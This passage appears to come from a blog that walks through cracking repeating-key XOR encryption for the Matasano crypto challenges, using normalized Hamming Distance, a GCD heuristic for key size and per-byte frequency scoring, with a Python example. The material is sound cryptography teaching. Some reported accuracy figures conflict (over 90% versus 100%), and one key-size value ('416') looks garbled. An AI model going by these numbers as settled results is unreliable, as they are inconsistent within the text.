The script applies normalized Hamming Distance to find the top n most likely key sizes (five is the default), which you can see listed towards the bottom of the screen. Next, the script calculates the <em>most frequently occurring greatest common divisor</em>, hereafter MFOGCD, of those top n probable key sizes. The GCD helps because multiples of the true key size score nearly as well as the key size itself: blocks 60 or 90 bytes apart were XOR'd with the same key bytes too, so the true size and its multiples crowd the top of the list, and the size they share is their GCD. In my testing, calculating the MFOGCD of the top n normalized average Hamming Distance values can be used to more accurately find the correct key size. This is a good example: as you can see, the correct key size is 30, but its normalized average Hamming Distance is fourth in the list of the top five.<br />
<br />
My script has a programmatic bias towards smaller key sizes, especially where they are the MFOGCD. This formula returns the correct key size more than 90% of the time in my testing where I was able to control for the MaxKeySize, whereas normalized average Hamming Distance alone only returns the correct key size about 40% of the time where MaxKeySize is controlled. If MaxKeySize is unknown, your mileage may vary.<br />
<br />
After the script determines the most probable key size, it transposes the ciphertext into blocks aligned on the key size byte boundaries. In other words, if the script determines the key size is 30 bytes, the first block is made up of ciphertext bytes 0, 30, 60, 90, 120, etc. -- every byte that was XOR'd with the first byte of the key. The next block begins with ciphertext byte 1, then 31, 61, 91, 121, etc. This process repeats until all ciphertext bytes have been allocated to their respective blocks, which reduces the problem to 30 independent single-byte XOR problems.<br />
<br />
Next the script moves into the actual brute-force phase, XORing each byte of the transposed blocks against the ASCII printable characters. That's the default; you can try all bytes 0x00 - 0xFF via the -includeNonPrintable command line switch. If you think this takes longer, you're right.<br />
<br />
After each transposed block is XOR'd with each candidate byte, the English letter frequency calculation is applied, and the byte that results in the highest score is deemed the most probable byte for that position in the key. The process repeats for each byte in the key.<br />
<br />
Once all the likely key bytes have been determined, the original ciphertext is XOR'd against that key and the likely plaintext is returned. You can see this above in the ProbableDecryptedValue property of the output. At first glance, the output looks pretty good, but if you read it carefully, you'll see it's not exactly correct. Remember we're dealing with probabilities.<br />
<br />
If you look at that ProbableKey property, you can see the probable key and you may be able to guess which byte is incorrect. You could use the <a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Decrypt.ps1">XOR-Decrypt.ps1</a> script, which can take a user supplied key string and decrypt the ciphertext if you want to be more exact. Without a key, <a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Decrypt.ps1">XOR-Decrypt.ps1</a>, assumes a single byte key and attempts to brute force it, but I digress.<br />
<br />
So that's the script when it's working well, but the probabilities sometimes don't come out so nicely. Here's another example:<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVBFOKEHOdSJ5SYhQbmueesiGsTwBC3WntVm_vqHtSNUe_yDni9jRubCvORF5finggVOiAr6qz16cEGCcMdK8ktmu13DA3ChGHznLQQV67zw-Ef4dqp12djhHfGzZw7GvGX_47kzmbtcI/s1600/Crack2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVBFOKEHOdSJ5SYhQbmueesiGsTwBC3WntVm_vqHtSNUe_yDni9jRubCvORF5finggVOiAr6qz16cEGCcMdK8ktmu13DA3ChGHznLQQV67zw-Ef4dqp12djhHfGzZw7GvGX_47kzmbtcI/s640/Crack2.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to enlarge</td></tr>
</tbody></table>
If you look at the ProbableDecryptedValue property here, you can plainly see this does not look like English plaintext. What happened? The script worked as written. It calculated the MFOGCD among the top five most probable key sizes, but that value, 16, was not itself listed among the top five, so it never tried 16 as a key size. Instead, it fell back to the smallest of the key sizes with the smallest normalized average Hamming Distance, 416, and that turned out to be horribly wrong. All is not lost, though.<br />
<br />
One approach that I've tried at this point is to run the script again, but add the -MaxKeySize parameter with an argument matching the smallest key size from the above run, 48. Here's the output of that run:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjJfHPLULrkhW-Rdm4bnrJ2Bstn-x6fGlP8vp9KkK9-ObCXdBOvYdZbs_aInsDjElqYEiDzPm2ui4cG6gOCSoK183DnbZZD9DQLPRuV18QCdnHv7PJrt3NYkGt46FQJWY9dGNwaIaCeDI/s1600/Crack3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="566" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjJfHPLULrkhW-Rdm4bnrJ2Bstn-x6fGlP8vp9KkK9-ObCXdBOvYdZbs_aInsDjElqYEiDzPm2ui4cG6gOCSoK183DnbZZD9DQLPRuV18QCdnHv7PJrt3NYkGt46FQJWY9dGNwaIaCeDI/s640/Crack3.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to enlarge</td></tr>
</tbody></table>
<br />
This looks more like English plaintext, but it's still not perfect. Note that the ProbableKeySize property is now 16 bytes; that was the MFOGCD from the previous run, so I'm not surprised to see it selected. 48 still has the lowest normalized average Hamming Distance, but remember, the script has a bias towards smaller keys, especially when those keys are also the MFOGCD of the top n ProbableKeySizes.<br />
<br />
Our key is obviously not 100% correct, but again there may be enough of the correct value there that you can make some guesses and use the <a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Decrypt.ps1">XOR-Decrypt.ps1</a> script to try them out until you have the correct key.<br />
<br />
What happens if you run the script again and pass -MaxKeySize as 16? Unfortunately, the most probable key size then becomes two, because that is the MFOGCD of the new top n list, and that yields even more inaccurate results.<br />
<br />
What's the practical use for this script? Some malware uses repeating XOR key encryption because it's easy to implement, so you may be able to apply it in your analysis. Does it work against code?<br />
<br />
Here's an example:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb4-Z883aBXFGyu1wellNy1kUHQ-R_kV6ktTQQrxRnykU4Gu8HWKTC7JI8ZN_8c_qZ6og63tu2VXxpjkz14jUN3STs6JjOM8JcvFfbb65XUYBWn2btXF1kNJzqzoLXe9SyskYcDnGonkg/s1600/Crack4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="570" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb4-Z883aBXFGyu1wellNy1kUHQ-R_kV6ktTQQrxRnykU4Gu8HWKTC7JI8ZN_8c_qZ6og63tu2VXxpjkz14jUN3STs6JjOM8JcvFfbb65XUYBWn2btXF1kNJzqzoLXe9SyskYcDnGonkg/s640/Crack4.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to enlarge</td></tr>
</tbody></table>
<br />
<a href="https://github.com/davehull/MCC/blob/master/sets/1/Crack-XORRepeatingKeyCrypto.ps1">Crack-XORRepeatingKeyCrypto.ps1</a>'s accuracy could be improved at a performance cost. If you look at <a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Decrypt.ps1">XOR-Decrypt.ps1</a>, you'll see that it has multiple scoring functions whose results are combined into one score: one for English letter frequency, one for English bigram frequency and one for English trigram frequency. All of the values returned from those functions factor into determining the most probable key for <a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Decrypt.ps1">XOR-Decrypt.ps1</a>. <a href="https://github.com/davehull/MCC/blob/master/sets/1/Crack-XORRepeatingKeyCrypto.ps1">Crack-XORRepeatingKeyCrypto.ps1</a> can't use the bigram and trigram scores, though, because of the way it works: it determines the most probable byte for each position of the key against the transposed blocks, and the bytes in a transposed block are not adjacent in the plaintext (each block holds every nth byte), so bigrams and trigrams within a block won't follow their natural frequency of occurrence.<br />
<br />
<a href="https://github.com/davehull/MCC/blob/master/sets/1/Crack-XORRepeatingKeyCrypto.ps1">Crack-XORRepeatingKeyCrypto.ps1</a> could factor in bigram and trigram scores when it moves to the stage of decrypting the original ciphertext, using what it has calculated as the most probable key, but that would require maintaining a list of the top n most probable keys and trying each of them, scoring them and choosing the one with the best score.<br />
<br />
Maybe if time permits, I'll try making this change, but I'm afraid of what it may do to the run time.<br />
<br />
Lastly, the script includes a .SYNOPSIS section with help and examples, like any PowerShell script should. So do a <span style="font-family: "Courier New", Courier, monospace;">Get-Help -Full .\Crack-XORRepeatingKeyCrypto.ps1 | more</span> for additional information.<br />
<br />
<h3 style="text-align: left;">XOR'd play: Normalized Hamming Distance</h3>
<span style="font-family: Arial, Helvetica, sans-serif;">Posted by davehull, 2015-06-07 (updated 2015-06-12).</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">I've been playing around with the matasano crypto challenges for my own edification. Let me say up front, I'm a noob when it comes to crypto. I've used gpg, pgp, OpenSSL, etc. as a consumer of crypto products for a long time, but I've never really peeled back the onion and honestly, I'm not deep enough into Matasano's challenges to really have increased my understanding of modern crypto much at all. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">My point is, I'm learning and I may say some things here out of ignorance. Take that as a disclaimer.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Also, this post is going to be ridiculously long. TLDR; In my testing, normalized Hamming Distance alone accurately returned the correct repeating XOR key size in about 40% of cases, but there's a simple calculation you can add that can increase this to over 90%.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In the challenges, Matasano introduces Hamming Distance, something I'd read about previously, but only in passing. Hamming Distance is the number of positions at which two strings of equal length differ. For example, the Hamming Distance between "fuse" and "fuel" is two because two characters would have to be changed to make the two strings the same.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">For the crypto challenges, Hamming Distance is calculated at the bit level rather than at the character level as above, so to get the Hamming Distance bit-by-bit, we convert the strings to byte arrays, then convert each byte to bits, then count the number of differences:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">PS> GetByteArray "fuse" | ForEach-Object { GetBits $_ }<br />01100110<br />01110101<br />01110011<br />01100101<br />PS> GetByteArray "fuel" | ForEach-Object { GetBits $_ }<br />01100110<br />01110101<br />01100101<br />01101100</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Obviously there's no difference in the bits for the first two bytes. Let's stack the bit strings for the last two bytes one after the other, it'll make counting the differences easier. I've highlighted the columns with differences:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">011<span style="background-color: yellow; color: black;">1</span>0<span style="background-color: yellow;">0</span><span style="background-color: yellow;">1</span>1 s 0110<span style="background-color: yellow;">0</span>10<span style="background-color: yellow;">1</span> e</span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="color: black;">011<span style="background-color: yellow;">0</span>0<span style="background-color: yellow;">1</span><span style="background-color: yellow;">0</span>1</span> e 0110<span style="background-color: yellow;">1</span>10<span style="background-color: yellow;">0</span> l</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In total then, there are five different bits between the two strings. The Hamming Distance then is five. Perceptive readers may notice that if the bytes above are XOR'd against one another, the result is that five bits are set to 1:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"> 01110011 s 01100101 e</span><br />
<span style="font-family: "Courier New", Courier, monospace;">XOR 01100101 e XOR 01101100 l</span><br />
<span style="font-family: "Courier New", Courier, monospace;">-------------- --------------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 00010110 00001001</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">So we can XOR each pair of bytes, count the 1 bits, and the sum is the Hamming Distance. Incidentally, Hamming Distance calculated at the bit level this way exploits the same statistical effect as the Index of Coincidence: when blocks of ciphertext are lined up on the key length, bytes encrypted under the same key byte are compared with each other, and two English letters differ in fewer bits than two random bytes would. That is what makes it useful to cryptographers attempting to crack polyalphabetic substitution ciphers such as the Vigenère cipher or repeating XOR key encryption, which is what the initial set of challenges are built around.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Repeating XOR key encryption is a simple encryption scheme and not one that is terribly secure. Here's an example of how it works. Let's take our "fuse fuel" and XOR it with the key "few."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Converting our strings to bytes:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">102:117:115:101:032:102:117:101:108 f:u:s:e: :f:u:e:l</span><br />
<span style="font-family: "Courier New", Courier, monospace;">102:101:119 f:e:w</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">In repeating XOR, since our key is shorter than our plaintext, we repeat the key, so the bytes line up as follows:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">102:117:115:101:032:102:117:101:108 f:u:s:e: :f:u:e:l</span><br />
<span style="font-family: "Courier New", Courier, monospace;">102:101:119:102:101:119:102:101:119 f:e:w:f:e:w:f:e:w</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Now we XOR the values together and the result in bytes is:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">000:016:004:003:069:017:019:000:027</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Notice that wherever identical bytes lined up with each other above, they cancel out to zero. The same is true bit by bit; to see this in action, consider the second byte pair:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">117 in bits 01110101 01110101</span><br />
<span style="font-family: "Courier New", Courier, monospace;">101 in bits 01100101 XOR'd: 01100101</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> --------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 00010000 in decimal 016 as above.</span><br />
<span style="font-family: "Courier New", Courier, monospace;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The challenge says that Normalized Hamming Distance can be used to calculate the probable XOR key size. An algorithm is given, but there's a little ambiguity in the directions, so you still have to figure out the details. Essentially, for each candidate key size n, you take the first n bytes of the ciphertext, calculate the Hamming Distance of those bytes against the next n bytes, and divide the result by n. Whichever size yields the smallest Normalized Hamming Distance is probably the key size.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Let's walk through this, but for the sake of demonstration, we'll modify our plaintext to the following:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">"fuse fuel for falling flocks"</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Yes, it's a silly string, but I think it will make explaining things easier due to its length. XOR encrypted with our key, we get the following byte array:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">000:016:004:003:069:017:019:000:027:070:003:024:020:069:017:007:009:027:015:011:016:070:003:027:009:006:028:021</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">If we apply Matasano's algorithm (it's not actually their algorithm, but I'm calling it that here because lazy), we read the first two bytes of our ciphertext, then the next two bytes, and get the Hamming Distance between them. We repeat this for each consecutive pair of two-byte blocks up to the end of the ciphertext, average all the values together, and divide by the block size (two initially); that's the "normalization" part. Then we repeat the whole process for three-byte blocks, then four, then five and so on, up to 14 bytes for this string, since its length is 28 bytes and we need two full blocks to compare.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Let's look at a few examples, I'm going to refer the Hamming Distance as HD, Average Hamming Distance as AvgHD and Normalized Average Hamming Distance as NAvgHD. Let's do some math:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 000:016 004:003 069:017 019:000 027:070 003:024</span><br />
<span style="font-family: "Courier New", Courier, monospace;">HD 004:003 HD 069:017 HD 019:000 HD 027:070 HD 003:024 HD 020:069</span><br />
<span style="font-family: "Courier New", Courier, monospace;">---------- ---------- ---------- ---------- ---------- ----------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 4 4 6 4 7 9</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">If you doubt any of the above is correct, convert the bytes to bits, XOR them against each other and count the 1s:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"> 00000000:00010000 (000:016)</span><br />
<span style="font-family: "Courier New", Courier, monospace;">XOR 00000100:00000011 (004:003)</span><br />
<span style="font-family: "Courier New", Courier, monospace;">-------------------------------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 00000100:00010011 (four ones) for an HD of 4</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">If we keep going like this across the entire 28 byte string, we'll calculate the HD for 13 pairs of consecutive two-byte blocks, sum up the 13 values and divide by 13 to get an AvgHD of 5.76923076923077, then divide that by two, because we were using two-byte blocks, and get a NAvgHD of 2.88461538461538. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Now we repeat this, but for pairs of three-byte blocks:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"> 000:016:004 003:069:017 019:000:027 070:003:024</span><br />
<span style="font-family: "Courier New", Courier, monospace;">HD 003:069:017 HD 019:000:027 HD 070:003:024 HD 020:069:017</span><br />
<span style="font-family: "Courier New", Courier, monospace;">-------------- -------------- -------------- --------------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 9 6 8 8</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Again all we're doing is XORing together the corresponding bytes, then counting the 1s in the results. If we do this for every pair of consecutive three-byte blocks (eight pairs, since 28 bytes give nine full blocks and the leftover byte is dropped), add up the results and divide by the number of pairs, we get an AvgHD of 7.625, which is actually higher than the AvgHD we had with our two-byte blocks, but we're interested in the NAvgHD, so we divide that number by three, the length of our blocks, and get a NAvgHD of 2.54166666666667, which is lower than our NAvgHD for a two byte key.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">We can repeat this process for block sizes up to 14 bytes, where we compare the first half of the ciphertext against the second half. The results look like this:</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">CalcKeySize AvgHD NAvgHD<br />----------- ----- ------<br /> 2 5.76923076923077 2.88461538461538<br /> 3 7.625 2.54166666666667<br /> 4 12.3333333333333 3.08333333333333<br /> 5 13.25 2.65<br /> 6 14.6666666666667 2.44444444444444<br /> 7 19.6666666666667 2.80952380952381<br /> 8 22.5 2.8125<br /> 9 20 2.22222222222222<br /> 10 26 2.6<br /> 11 24 2.18181818181818<br /> 12 26 2.16666666666667<br /> 13 34 2.61538461538462<br /> 14 38 2.71428571428571</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Sorted by NAvgHD, since the block size with the smallest NAvgHD is probably our key size, the table looks like this:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: "Courier New", Courier, monospace;">CalcKeySize AvgHD NAvgHD<br />----------- ----- ------<br /> <span style="background-color: #b6d7a8;">12</span> 26 2.16666666666667<br /> 11 24 2.18181818181818<br /> <span style="background-color: #b6d7a8;">9</span> 20 2.22222222222222<br /> <span style="background-color: #b6d7a8;">6</span> 14.6666666666667 2.44444444444444<br /> <span style="background-color: yellow;">3 7.625 2.54166666666667</span><br /> 10 26 2.6<br /> 13 34 2.61538461538462<br /> 5 13.25 2.65<br /> 14 38 2.71428571428571<br /> 7 19.6666666666667 2.80952380952381<br /> 8 22.5 2.8125<br /> 2 5.76923076923077 2.88461538461538<br /> 4 12.3333333333333 3.08333333333333</span><br />
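<span style="font-family: Arial, Helvetica, sans-serif;">Here is the whole walk-through above (bit-level Hamming Distance, repeating XOR with "few", and the NAvgHD table for every block size from 2 to 14) as an added Python example; it is not the PowerShell behind the GetByteArray and GetBits calls shown earlier. The function names are mine; the plaintext, key and expected numbers are the post's own, and running it reproduces the table, sorted order included.</span><br />

```python
"""Bit-level Hamming Distance and the normalized-HD key size ranking."""
from typing import List, Optional, Tuple


def repeating_key_xor(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: the key is cycled across the data."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def hamming_distance(a: bytes, b: bytes) -> int:
    """Number of differing bits: XOR each byte pair and count the 1 bits."""
    if len(a) != len(b):
        raise ValueError("Hamming Distance is defined for equal-length inputs")
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def rank_key_sizes(ct: bytes, min_keysize: int = 2,
                   max_keysize: Optional[int] = None) -> List[Tuple[int, float, float]]:
    """For each candidate size k: cut ct into consecutive k-byte blocks (a
    trailing partial block is dropped), take the HD of every block against the
    next one, average those values (AvgHD) and divide by k (NAvgHD).

    Returns rows of (k, AvgHD, NAvgHD) sorted by NAvgHD, smallest first.
    """
    if max_keysize is None:
        max_keysize = len(ct) // 2          # need at least two full blocks
    rows = []
    for k in range(min_keysize, max_keysize + 1):
        blocks = [ct[i:i + k] for i in range(0, len(ct) - k + 1, k)]
        pairs = list(zip(blocks, blocks[1:]))
        if not pairs:                       # fewer than two full blocks
            continue
        avg_hd = sum(hamming_distance(x, y) for x, y in pairs) / len(pairs)
        rows.append((k, avg_hd, avg_hd / k))
    rows.sort(key=lambda row: row[2])
    return rows


# The post's example: plaintext and key taken from the text above.
PLAINTEXT = b"fuse fuel for falling flocks"
KEY = b"few"
CIPHERTEXT = repeating_key_xor(PLAINTEXT, KEY)


def print_table(rows: List[Tuple[int, float, float]]) -> None:
    print("CalcKeySize  AvgHD             NAvgHD")
    for k, avg_hd, navg_hd in rows:
        print(f"{k:11d}  {avg_hd:<16.14g}  {navg_hd:.14g}")


if __name__ == "__main__":
    print(":".join(f"{b:03d}" for b in CIPHERTEXT))
    print("HD(fuse, fuel) =", hamming_distance(b"fuse", b"fuel"))
    print_table(rank_key_sizes(CIPHERTEXT))
```

<span style="font-family: Arial, Helvetica, sans-serif;">Note the fence post: a 28-byte ciphertext gives 13 pairs of two-byte blocks, not 14, and eight pairs of three-byte blocks, because the 28th byte does not fill a ninth block's partner. Getting that count wrong shifts every AvgHD and is exactly the kind of off-by-one that is easy to miss when the sorted order still looks plausible.</span><br />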
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">But our key was "few," that's three bytes, why isn't it at the top of the list? Matasano's instructions do state the value with the lowest NAvgHD is probably the key size, they don't say it will be the key size. In their example, the value with the lowest NAvgHD is the key size, but in my testing, the size with the lowest NAvgHD is not always the actual key size, as you can clearly see above. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Let's dive into this a bit more.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The HDs for byte pairs of nine bytes:</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 000:016:004:003:069:017:019:000:027</span><br />
<span style="font-family: "Courier New", Courier, monospace;">HD 070:003:024:020:069:017:007:009:027</span><br />
<span style="font-family: "Courier New", Courier, monospace;">--------------------------------------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 17</span><br />
<span style="font-family: "Courier New", Courier, monospace;"></span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 070:003:024:020:069:017:007:009:027</span><br />
<span style="font-family: "Courier New", Courier, monospace;">HD 015:011:016:070:003:027:009:006:028</span><br />
<span style="font-family: "Courier New", Courier, monospace;">--------------------------------------</span><br />
<span style="font-family: "Courier New", Courier, monospace;"> 23</span><br />
<span style="font-family: "Courier New", Courier, monospace;"></span><br />
<span style="font-family: "Courier New", Courier, monospace;"> AvgHD: (17 + 23) / 2 = 20</span><br />
<span style="font-family: "Courier New", Courier, monospace;">NAvgHD: 20 / 9 = 2.22222222222222</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">If you compare the AvgHD for smaller key sizes with the AvgHD for the larger key sizes, you'll see the smaller ones have lower AvgHDs. This makes sense: the raw HD is a sum over every byte in the block, so longer blocks accumulate more differing bits simply because there are more bytes to differ, which is exactly why the value is normalized by dividing by the block size.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">What really throws things off is that any multiple of the actual key size also lines the key up with itself, so multiples of the key size score about as well as the key size itself and normalization does not separate them; you may have noticed that most of the values with lower NAvgHDs are multiples of the actual key size. In my testing across 20+ different plaintext samples, this trend appears again and again when calculating Hamming Distance to find the repeating XOR key size.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Matasano's instructions say, "the KEYSIZE with the smallest normalized edit distance is probably the key." Edit distance is the more general term (it also covers insertions and deletions); for two equal-length strings compared position by position, as here, it is the Hamming Distance. They go on to say, "You could proceed perhaps with the smallest 2-3 KEYSIZE values. Or take 4 KEYSIZE blocks instead of 2 and average the distances."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In their example, the key size with the smallest normalized HD is in fact the key size. I thought maybe that was because the maximum key size they ask you to try is 40 bytes and the correct key size is not something that divides evenly into 40, but even increasing the maximum key size to a couple of multiples over the correct key size does not cause a larger key size to rise to the top for their ciphertext. Again, though, in my tests over 20+ different sample plaintexts encrypted thousands of times with random keys from 2 to 100 bytes, that's the exception.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">For my testing, admittedly limited given the infinite number of possible plaintext messages, I took 20 different samples of text from various sources, blogs, books, both technical and fiction -- most ranging from a paragraph to a page in length, sorry I won't be more precise, again, lazy. I ran these texts through a script that would generate a random key from 2 to 100 bytes in length, random bytes in the range 0x00 through 0xFF, the encrypted text was then passed through the HD algorithm as above and since I knew the actual key size, I set an upper bound on the key sizes I would try to be three times the actual key size. I selected the top five values in terms of lowest NAvgHD for each ciphertext. I ran this test 7758 times.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In 38% of the cases, the key size with the lowest NAvgHD was the correct key size.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In 33% of the cases, the key size with the second lowest NAvgHD was the correct key size.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In 28% of the cases, the key size with the third lowest NAvgHD was the correct key size.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">During my experimentation, the correct key size landed outside of the top three values a few times, but very rarely and I was still tweaking the algorithm to get it correct as I made a fence post error that took me some time to spot and resolve. I'm not counting those values in my final tally. The numbers above are from the last tests I ran after getting all bugs worked out of the algorithm, but your mileage may vary.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Still, I found the above numbers discouraging. If I'm going to write a tool for brute force decrypting XOR encrypted data and the first step in the process is to get the correct key size, I want the algorithm to be more reliable than ~40%. I could do what Matasano suggests and simply try the first three values, but I suspected work could be done to improve this.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">I believe I was right, but again, my sample size is small, but the results across that sample size are promising and the solution was simple, so simple that you've probably already thought of it. I'm sure many others have, but I found no references to it, possibly because search engines fail, or I fail at using them, or because my solution is bogus and just happened to work for my test cases and methodology.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Here's what I did, I saved the top five results -- the five most probable XOR key sizes based on NAvgHD -- then calculated the greatest common divisor (GCD) for the first two key sizes, then the first and third key sizes, then the second and third key sizes. The results were assigned to variables, GCD12, GCD13 and GCD23.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">If the following conditions are met, GCD12 is returned as the most probable key size:</span><br />
<ol>
<li><span style="font-family: Arial, Helvetica, sans-serif;">GCD12 is not one, and</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">GCD12 is a key size in the top n key sizes, and</span>
<ol>
<li><span style="font-family: Arial, Helvetica, sans-serif;">GCD12 is equal to both GCD13 and GCD23, or</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">GCD12 is equal to either the first or the second most probable key size.</span></li>
</ol>
</li>
</ol>
<span style="font-family: Arial, Helvetica, sans-serif;">If the above conditions are not met, the script returns the key size with the smallest NAvgHD as the most probable key size.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">How well does this algorithm work? In the testing above, all 7758 cases, I applied this algorithm and the correct key size was returned as the most probable key size 100% of the time.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Recall that in my test script, I'm calculating HDs for all key sizes up to three times the size of the actual key. This does impact the outcome of the script. As a test of this, I changed the script to calculate HDs for all combinations up to four times the actual key size. The results came out as follows across 2574 test runs:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
